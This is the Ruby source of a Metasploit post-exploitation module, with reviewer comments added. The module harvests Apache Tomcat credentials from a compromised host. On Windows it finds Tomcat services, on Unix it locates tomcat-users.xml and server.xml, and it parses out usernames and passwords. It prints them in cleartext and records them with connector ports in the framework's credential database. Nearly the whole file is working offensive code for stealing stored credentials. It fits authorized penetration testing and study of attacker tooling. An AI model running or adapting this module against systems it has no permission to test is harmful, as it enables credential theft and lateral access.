Path: blob/master/modules/post/multi/gather/tomcat_gather.rb
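##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that reads Tomcat's tomcat-users.xml and server.xml on an
# existing session, pairs each <user> entry with a connector port and stores
# the result in the framework credential database.
#
# Parsing is line-based string splitting, not XML parsing: an entry is only
# recognised when `<user username="` and `password="` sit on the same line.
#
# NOTE(review): the password attribute is recorded verbatim with
# private_type :password. If the realm is configured with a digest
# CredentialHandler the attribute holds a digest rather than a cleartext
# password -- confirm how consumers of the stored credential treat it.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::Services

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gather Tomcat Credentials',
        'Description' => %q{
          This module will attempt to collect credentials from Tomcat services running on the machine.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Koen Riepe <[email protected]>', # Module author
        ],
        'Platform' => [ 'win', 'linux' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  # Parallel arrays: index i of each array describes one discovered entry.
  #
  # NOTE(review): these are process-wide globals, so they are shared by every
  # instance of this module in the same framework process. Two overlapping
  # runs would interleave their entries. `run` clears them in an `ensure` so
  # that a failed run cannot leak entries into the next one.
  $username = []
  $password = []
  $port = []
  $paths = []

  # Stores one username/password pair and a matching login entry.
  #
  # @param user [String] value of the username attribute
  # @param pass [String] value of the password attribute
  # @param port [Integer, Object] connector port; anything that is not an
  #   Integer is replaced by 8080
  # @return [void] returns early without storing anything when either
  #   string is empty
  def report_creds(user, pass, port)
    return if user.empty? || pass.empty?

    # Assemble data about the credential objects we will be creating
    credential_data = {
      origin_type: :session,
      post_reference_name: fullname,
      private_data: pass,
      private_type: :password,
      session_id: session_db_id,
      username: user,
      workspace_id: myworkspace_id
    }

    credential_core = create_credential(credential_data)

    unless port.is_a?(Integer)
      port = 8080
      print_status("Port not an Integer, defaulting to port #{port} for creds database")
    end

    login_data = {
      core: credential_core,
      status: Metasploit::Model::Login::Status::UNTRIED,
      address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
      port: port,
      service_name: 'Tomcat',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }
    create_credential_login(login_data)
  end

  # Windows path: derives a Tomcat home from every service whose name
  # contains "tomcat", then reads conf\tomcat-users.xml and conf\server.xml
  # below it.
  #
  # @return [void]
  def gatherwin
    print_status('Windows OS detected, enumerating services')
    tomcat_homes = []
    service_list.each do |service|
      next unless service[:name].downcase.include?('tomcat')

      print_good('Tomcat service found')
      tomcat_homes.push(service_info(service[:name])[:path].split('\\bin\\')[0])
    end

    if tomcat_homes.empty?
      print_status('No Tomcat home can be determined')
      return
    end

    tomcat_homes.each do |raw_home|
      # A quoted service path keeps its leading quote after the split above;
      # take the text between the first pair of quotes.
      tomcat_home = raw_home.include?('"') ? raw_home.split('"')[1] : raw_home

      conf_path = "#{tomcat_home}\\conf\\tomcat-users.xml"
      if exist?(conf_path)
        print_status("#{conf_path} found!")
        collect_tomcat_users(read_file(conf_path).split("\n"), conf_path)
      end

      # Only scan server.xml when it exists. The previous code iterated
      # whatever the `xml` local held at this point: the tomcat-users.xml
      # lines, or nil (NoMethodError) when neither file was present.
      port_path = "#{tomcat_home}\\conf\\server.xml"
      next unless exist?(port_path)

      collect_connector_ports(read_file(port_path).split("\n"))
    end
  end

  # Unix path: asks `locate` for tomcat-users.xml and server.xml and parses
  # every hit that exists. server.xml hits are only used when their path
  # contains "tomcat".
  #
  # @return [void]
  def gathernix
    print_status('Unix OS detected')
    user_files = cmd_exec('locate tomcat-users.xml').split("\n")
    if user_files.empty?
      print_status('No tomcat installation has been detected')
    else
      user_files.each do |path|
        next unless exist?(path)

        print_status("#{path} found")
        begin
          collect_tomcat_users(read_file(path).split("\n"), path)
        rescue StandardError
          print_error("Cannot open #{path} you probably don't have permission to open the file or parsing failed")
        end
      end
    end

    port_path = cmd_exec('locate server.xml').split("\n")
    if port_path.empty?
      print_status('Failed to detect tomcat service port')
    else
      port_path.each do |path|
        next unless exist?(path) && path.include?('tomcat')

        print_status("Attempting to extract Tomcat listening ports from #{path}")
        begin
          collect_connector_ports(read_file(path).split("\n"))
        rescue StandardError
          print_status("Cannot open #{path} you probably don't have permission to open the file or parsing failed")
        end
      end
    end
  end

  # Entry point: picks the gatherer from sysinfo['OS'], prints every entry
  # found and stores it through report_creds.
  #
  # Each pair is echoed in cleartext by print_good, so it also appears in any
  # captured console output.
  #
  # @return [void]
  def run
    if sysinfo
      if sysinfo['OS'].include?('Windows')
        gatherwin
      else
        gathernix
      end
    else
      print_error('Incompatible session type, sysinfo is not available.')
    end

    print_status('No user credentials have been found') if $username.empty?

    $username.each_index do |i|
      print_good("Username and password found in #{$paths[i]} - #{$username[i]}:#{$password[i]}")
      report_creds($username[i], $password[i], $port[i])
    end
  ensure
    # Always clear the shared arrays, including when a gatherer or
    # report_creds raised, so the next run starts empty and cannot record
    # stale entries.
    $username = []
    $password = []
    $port = []
    $paths = []
  end

  private

  # Returns the text between +marker+ and the next double quote.
  #
  # @param line [String] one line of the XML file
  # @param marker [String] attribute prefix including the opening quote
  # @return [String, nil] nil when +marker+ is not followed by anything on
  #   this line; '' when the attribute is present but empty
  def tomcat_attr_value(line, marker)
    rest = line.split(marker)[1]
    return nil if rest.nil?

    rest.split('"')[0].to_s
  end

  # Appends every <user> entry found in +lines+ to the shared arrays.
  #
  # Username and password are extracted before anything is pushed, so a line
  # carrying only one of the two attributes is skipped instead of leaving
  # $username one element longer than $password (which would pair later
  # usernames with the wrong password).
  #
  # Comment tracking is line-based: a line that opens a comment switches the
  # state on, and only a later line containing `-->` switches it off, so a
  # comment opened and closed on one line leaves the state on.
  #
  # @param lines [Array<String>] file content split on newlines
  # @param source_path [String] path recorded next to each entry
  # @return [void]
  def collect_tomcat_users(lines, source_path)
    in_comment = false
    lines.each do |line|
      if line.include?('<user username=') && !in_comment
        user = tomcat_attr_value(line, '<user username="')
        pass = tomcat_attr_value(line, 'password="')
        next if user.nil? || pass.nil?

        $username.push(user)
        $password.push(pass)
        $paths.push(source_path)
      elsif line.include?('<!--')
        in_comment = true
      elsif line.include?('-->') && in_comment
        in_comment = false
      end
    end
  end

  # Appends the port of every uncommented <Connector port="..."> line to
  # $port, once per entry currently held in $username.
  #
  # Connector lines whose first attribute is not `port` are skipped; they
  # previously raised NoMethodError on nil.
  #
  # @param lines [Array<String>] file content split on newlines
  # @return [void]
  def collect_connector_ports(lines)
    in_comment = false
    lines.each do |line|
      if line.include?('<Connector') && !in_comment
        port = tomcat_attr_value(line, '<Connector port="')
        next if port.nil?

        $username.count.times { $port.push(port.to_i) }
      elsif line.include?('<!--')
        in_comment = true
      elsif line.include?('-->') && in_comment
        in_comment = false
      end
    end
  end
end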